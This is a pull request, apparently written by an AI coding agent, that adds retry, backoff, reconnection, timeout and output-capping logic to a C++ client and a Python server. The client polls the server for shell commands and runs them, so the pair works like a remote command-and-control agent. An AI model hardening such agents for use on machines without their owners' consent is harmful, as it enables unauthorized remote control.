### PR TITLE
Improve error handling and polling timeout

### DIFF
--- a/client.cpp
+++ b/client.cpp
@@ -16,6 +16,7 @@
 
 std::string host = "localhost";
 std::string port = "8000";
+const size_t MAX_OUTPUT = 4096;
 
 #ifdef _WIN32
 using socket_t = SOCKET;
@@ -42,63 +43,94 @@ static bool send_all(socket_t sock, const char* buf, size_t len) {
 }
 
 std::string send_request(const addrinfo* res, const std::string& req) {
-    socket_t sock = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
-    if (sock == INVALID_SOCKET) {
-        std::cerr << "socket creation failed" << std::endl;
-        return "";
-    }
-    if (connect(sock, res->ai_addr, (int)res->ai_addrlen) == SOCKET_ERROR) {
+    int attempts = 0;
+    int backoff = 1;
+    while (attempts < 5) {
+        socket_t sock = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
+        if (sock == INVALID_SOCKET) {
+            std::cerr << "socket creation failed" << std::endl;
+            return "";
+        }
+        // set a ~35s receive timeout so poll responses can arrive
 #ifdef _WIN32
-        std::cerr << "connect failed: " << WSAGetLastError() << std::endl;
-        closesocket(sock);
+        DWORD timeout = 35000;
+        setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (const char*)&timeout, sizeof(timeout));
 #else
-        perror("connect");
-        close(sock);
+        timeval tv{};
+        tv.tv_sec = 35;
+        setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));
 #endif
-        return "";
-    }
-    if (!send_all(sock, req.c_str(), req.size())) {
+        if (connect(sock, res->ai_addr, (int)res->ai_addrlen) == SOCKET_ERROR) {
 #ifdef _WIN32
-        std::cerr << "send failed: " << WSAGetLastError() << std::endl;
+            std::cerr << "connect failed: " << WSAGetLastError() << std::endl;
+            closesocket(sock);
 #else
-        perror("send");
+            perror("connect");
+            close(sock);
 #endif
-    }
-    std::string resp;
-    char buf[4096];
-    size_t content_length = 0;
-    bool got_headers = false;
-    size_t body_start = 0;
-    int n;
-    while ((n = recv(sock, buf, sizeof(buf), 0)) > 0) {
-        resp.append(buf, buf + n);
-        if (!got_headers) {
-            size_t pos = resp.find("\r\n\r\n");
-            if (pos != std::string::npos) {
-                got_headers = true;
-                body_start = pos + 4;
-                size_t cl = resp.find("Content-Length:");
-                if (cl != std::string::npos) {
-                    cl += 15;
-                    while (cl < resp.size() && resp[cl] == ' ') cl++;
-                    size_t end = resp.find("\r\n", cl);
-                    if (end != std::string::npos) {
-                        content_length = std::stoul(resp.substr(cl, end - cl));
+        } else if (!send_all(sock, req.c_str(), req.size())) {
+#ifdef _WIN32
+            std::cerr << "send failed: " << WSAGetLastError() << std::endl;
+#else
+            perror("send");
+#endif
+#ifdef _WIN32
+            closesocket(sock);
+#else
+            close(sock);
+#endif
+        } else {
+            std::string resp;
+            char buf[4096];
+            size_t content_length = 0;
+            bool got_headers = false;
+            size_t body_start = 0;
+            int n;
+            bool failed = false;
+            while ((n = recv(sock, buf, sizeof(buf), 0)) > 0) {
+                resp.append(buf, buf + n);
+                if (!got_headers) {
+                    size_t pos = resp.find("\r\n\r\n");
+                    if (pos != std::string::npos) {
+                        got_headers = true;
+                        body_start = pos + 4;
+                        size_t cl = resp.find("Content-Length:");
+                        if (cl != std::string::npos) {
+                            cl += 15;
+                            while (cl < resp.size() && resp[cl] == ' ') cl++;
+                            size_t end = resp.find("\r\n", cl);
+                            if (end != std::string::npos) {
+                                content_length = std::stoul(resp.substr(cl, end - cl));
+                            }
+                        }
                     }
                 }
+                if (got_headers && resp.size() - body_start >= content_length)
+                    break;
+            }
+            if (n <= 0 && (!got_headers || resp.size() - body_start < content_length))
+                failed = true;
+#ifdef _WIN32
+            closesocket(sock);
+#else
+            close(sock);
+#endif
+            if (!failed) {
+                if (got_headers)
+                    return resp.substr(body_start, content_length);
+                return resp;
             }
         }
-        if (got_headers && resp.size() - body_start >= content_length)
-            break;
-    }
 #ifdef _WIN32
-    closesocket(sock);
+        Sleep(backoff * 1000);
 #else
-    close(sock);
+        sleep(backoff);
 #endif
-    if (got_headers)
-        return resp.substr(body_start, content_length);
-    return resp;
+        attempts++;
+        if (backoff < 32)
+            backoff *= 2;
+    }
+    return "";
 }
 
 std::string send_request_host(const std::string& h, const std::string& p, const std::string& req) {
@@ -158,13 +190,30 @@ int main(int argc, char* argv[]) {
     req += "Content-Length: " + std::to_string(body.size()) + "\r\n";
     req += "\r\n";
     req += body;
-    send_request(res, req);
+    int reg_backoff = 1;
+    while (true) {
+        std::string rresp = send_request(res, req);
+        if (rresp == "Registered")
+            break;
+        std::cerr << "Registration failed, retrying in " << reg_backoff << "s" << std::endl;
+#ifdef _WIN32
+        Sleep(reg_backoff * 1000);
+#else
+        sleep(reg_backoff);
+#endif
+        if (reg_backoff < 32)
+            reg_backoff *= 2;
+    }
 
     while (true) {
         std::string pollReq = "GET /poll?client_id=" + client_id + " HTTP/1.1\r\n";
         pollReq += "Host: " + host + "\r\n";
         pollReq += "Connection: close\r\n\r\n";
         std::string resp = send_request(res, pollReq);
+        if (resp.empty()) {
+            std::cerr << "Polling failed, attempting to reconnect..." << std::endl;
+            continue;
+        }
         auto pos = resp.find("\r\n\r\n");
         std::string bodyResp = pos != std::string::npos ? resp.substr(pos + 4) : resp;
         std::string command;
@@ -190,7 +239,17 @@ int main(int argc, char* argv[]) {
             if (pipe) {
                 char buf[1024];
                 while (fgets(buf, sizeof(buf), pipe)) {
-                    result += buf;
+                    if (result.size() < MAX_OUTPUT) {
+                        size_t to_copy = strlen(buf);
+                        if (result.size() + to_copy > MAX_OUTPUT) {
+                            to_copy = MAX_OUTPUT - result.size();
+                        }
+                        result.append(buf, to_copy);
+                        if (result.size() >= MAX_OUTPUT) {
+                            result += "...";
+                            break;
+                        }
+                    }
                 }
 #ifdef _WIN32
                 _pclose(pipe);

--- a/server.py
+++ b/server.py
@@ -87,6 +87,13 @@ def geolocate(ip):
     return random.uniform(-60, 60), random.uniform(-180, 180)
 
 class Handler(BaseHTTPRequestHandler):
+    def _safe_write(self, body: bytes) -> None:
+        """Write to the socket, ignoring errors if the client disconnected."""
+        try:
+            self.wfile.write(body)
+        except OSError:
+            pass
+
     def do_POST(self):
         length = int(self.headers.get('Content-Length', 0))
         data = self.rfile.read(length)
@@ -114,13 +121,13 @@ class Handler(BaseHTTPRequestHandler):
                 self.send_response(200)
                 self.send_header('Content-Length', str(len(body)))
                 self.end_headers()
-                self.wfile.write(body)
+                self._safe_write(body)
             else:
                 body = b'Bad Request'
                 self.send_response(400)
                 self.send_header('Content-Length', str(len(body)))
                 self.end_headers()
-                self.wfile.write(body)
+                self._safe_write(body)
         elif self.path == '/send':
             try:
                 payload = json.loads(data.decode())
@@ -132,7 +139,7 @@ class Handler(BaseHTTPRequestHandler):
                     self.send_response(200)
                     self.send_header('Content-Length', str(len(body)))
                     self.end_headers()
-                    self.wfile.write(body)
+                    self._safe_write(body)
                     return
             except Exception:
                 pass
@@ -140,7 +147,7 @@ class Handler(BaseHTTPRequestHandler):
             self.send_response(400)
             self.send_header('Content-Length', str(len(body)))
             self.end_headers()
-            self.wfile.write(body)
+            self._safe_write(body)
         elif self.path == '/result':
             try:
                 payload = json.loads(data.decode())
@@ -152,7 +159,7 @@ class Handler(BaseHTTPRequestHandler):
                     self.send_response(200)
                     self.send_header('Content-Length', str(len(body)))
                     self.end_headers()
-                    self.wfile.write(body)
+                    self._safe_write(body)
                     return
             except Exception:
                 pass
@@ -160,7 +167,7 @@ class Handler(BaseHTTPRequestHandler):
             self.send_response(400)
             self.send_header('Content-Length', str(len(body)))
             self.end_headers()
-            self.wfile.write(body)
+            self._safe_write(body)
         else:
             self.send_response(404)
             self.end_headers()
@@ -182,7 +189,7 @@ class Handler(BaseHTTPRequestHandler):
             self.send_header('Content-Type', 'application/json')
             self.send_header('Content-Length', str(len(body)))
             self.end_headers()
-            self.wfile.write(body)
+            self._safe_write(body)
         elif parsed.path == '/poll':
             qs = parse_qs(parsed.query)
             cid = qs.get('client_id', [None])[0]
@@ -196,7 +203,7 @@ class Handler(BaseHTTPRequestHandler):
                 self.send_header('Content-Type', 'application/json')
                 self.send_header('Content-Length', str(len(body)))
                 self.end_headers()
-                self.wfile.write(body)
+                self._safe_write(body)
             else:
                 self.send_response(404)
                 self.send_header('Content-Length', '0')
@@ -210,7 +217,7 @@ class Handler(BaseHTTPRequestHandler):
                 self.send_header('Content-Type', 'application/json')
                 self.send_header('Content-Length', str(len(body)))
                 self.end_headers()
-                self.wfile.write(body)
+                self._safe_write(body)
             else:
                 self.send_response(404)
                 self.send_header('Content-Length', '0')
@@ -221,7 +228,7 @@ class Handler(BaseHTTPRequestHandler):
             self.send_header('Content-Type', 'text/html')
             self.send_header('Content-Length', str(len(body)))
             self.end_headers()
-            self.wfile.write(body)
+            self._safe_write(body)
         else:
             self.send_response(404)
             self.send_header('Content-Length', '0')


### PR DESCRIPTION
## Summary
- avoid server tracebacks when client disconnects by safely writing responses
- set 35s receive timeout so the client can wait for long poll responses
- keep retry logic from previous update

## Testing
- `g++ -std=c++11 client.cpp -o client`
- `python3 -m py_compile server.py`


------
https://chatgpt.com/codex/tasks/task_e_68495f5365708330a45ae1dd22055ee9